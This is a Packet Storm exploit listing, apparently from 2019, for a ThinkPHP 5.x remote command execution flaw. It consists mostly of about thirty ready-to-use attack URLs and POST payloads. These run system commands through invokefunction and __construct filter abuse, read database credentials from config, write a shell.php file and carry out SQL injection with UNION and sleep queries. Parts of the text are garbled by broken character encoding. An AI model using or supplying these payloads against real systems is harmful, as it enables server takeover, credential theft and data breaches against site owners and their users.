exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ThinkPHP 5.x Remote Command Execution

ThinkPHP 5.x Remote Command Execution
Posted Jan 14, 2019
Authored by vr_system

ThinkPHP version 5.x suffers from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | a3a0d90dd580a9cdc42b8b449a00f5a6a5823b29948d0c84e8619865d6cf8ad4

ThinkPHP 5.x Remote Command Execution

Change Mirror Download
# Exploit Title: thinkphp 5.X RCE
# Date: 2019-1-14
# Exploit Author: vr_system
# Vendor Homepage: http://www.thinkphp.cn/
# Software Link: http://www.thinkphp.cn/down.html
# Version: 5.x
# Tested on: windows 7/10
# CVE : None

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

1ahttps://blog.thinkphp.cn/869075
2ahttps://blog.thinkphp.cn/910675

POCi1/4

thinkphp 5.0.22
1ahttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2ahttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3ahttp://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4ahttp://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5
5ahttp://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21
6ahttp://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7ahttp://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*
8ahttp://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9ahttp://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10ahttp://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11ahttp://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12ahttp://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13ahttp://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14ahttp://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15ahttp://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

aeacY=cae!
16a?s=index/\think\module/action/param1/${@phpinfo()}
17a?s=index/\think\Module/Action/Param/${@phpinfo()}
18a?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19aindex.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20aindex.php?s=/home/shopcart/getPricetotal/tag/1%27
21aindex.php?s=/home/shopcart/getpriceNum/id/1%27
22aindex.php?s=/home/user/cut/id/1%27
23aindex.php?s=/home/service/index/id/1%27
24aindex.php?s=/home/pay/chongzhi/orderid/1%27
25aindex.php?s=/home/pay/index/orderid/1%27
26aindex.php?s=/home/order/complete/id/1%27
27aindex.php?s=/home/order/complete/id/1%27
28aindex.php?s=/home/order/detail/id/1%27
29aindex.php?s=/home/order/cancel/id/1%27
30aindex.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31aPOST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23i1/4a(r)ae'ci1/4debugae"!a1/4
32a(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(a(r)ae'c)
33ai1/4posti1/4public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thhinkphp 5.0.10i1/4a(r)ae'ci1/4
34a(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close